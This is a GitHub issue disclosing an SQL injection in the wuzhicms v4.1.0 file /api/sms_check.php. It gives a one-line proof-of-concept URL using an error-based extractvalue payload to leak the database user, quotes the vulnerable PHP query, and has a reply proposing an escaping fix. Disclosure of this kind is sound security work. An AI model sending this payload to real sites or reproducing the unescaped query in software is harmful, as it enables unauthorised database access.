Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

wuzhicms v4.1.0 have a sqli in the front #138

Open
love71 opened this issue May 28, 2018 · 1 comment
Open

wuzhicms v4.1.0 have a sqli in the front #138

love71 opened this issue May 28, 2018 · 1 comment

Comments

@love71
Copy link

love71 commented May 28, 2018

POC:
/api/sms_check.php?param=1%27and extractvalue(1,concat(0x7e,user()))%23
Vulnerability file: /api/sms_check.php
define('WWW_ROOT',substr(dirname(FILE), 0, -4).'/');
require '../configs/web_config.php';
require COREframe_ROOT.'core.php';

if(!isset($GLOBALS['param'])) {
exit('{"info":"验证失败","status":"n"}');
} elseif($GLOBALS['param']=='') {
exit('{"info":"验证失败","status":"n"}');
}
$code = strip_tags($GLOBALS['param']);
$posttime = SYS_TIME-300;//5分钟内有效
$db = load_class('db');
$r = $db->get_one('sms_checkcode',"code='$code' AND posttime>$posttime",'*',0,'id DESC');
if($r) {
exit('{"info":"验证通过","status":"y"}');
} else {
exit('{"info":"验证失败","status":"n"}');
}

The $code parameter is taken directly into the execution of the get_one function without any filtering. The get_one function also detects the incoming SQL filtering, resulting in SQL injection.
The official website has been reproduced successfully.

@love71 love71 changed the title 五指CMS v4.1.0前台存在SQL注入 wuzhicms v4.1.0 have a sqli in the front May 28, 2018
@scccco
Copy link

scccco commented Jul 24, 2020

$db = load_class('db');
$code = mysqli_real_escape_string($db->master_db->link,$code);
$r = $db->get_one('sms_checkcode',"code='$code' AND posttime>$posttime",'*',0,'id DESC');

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants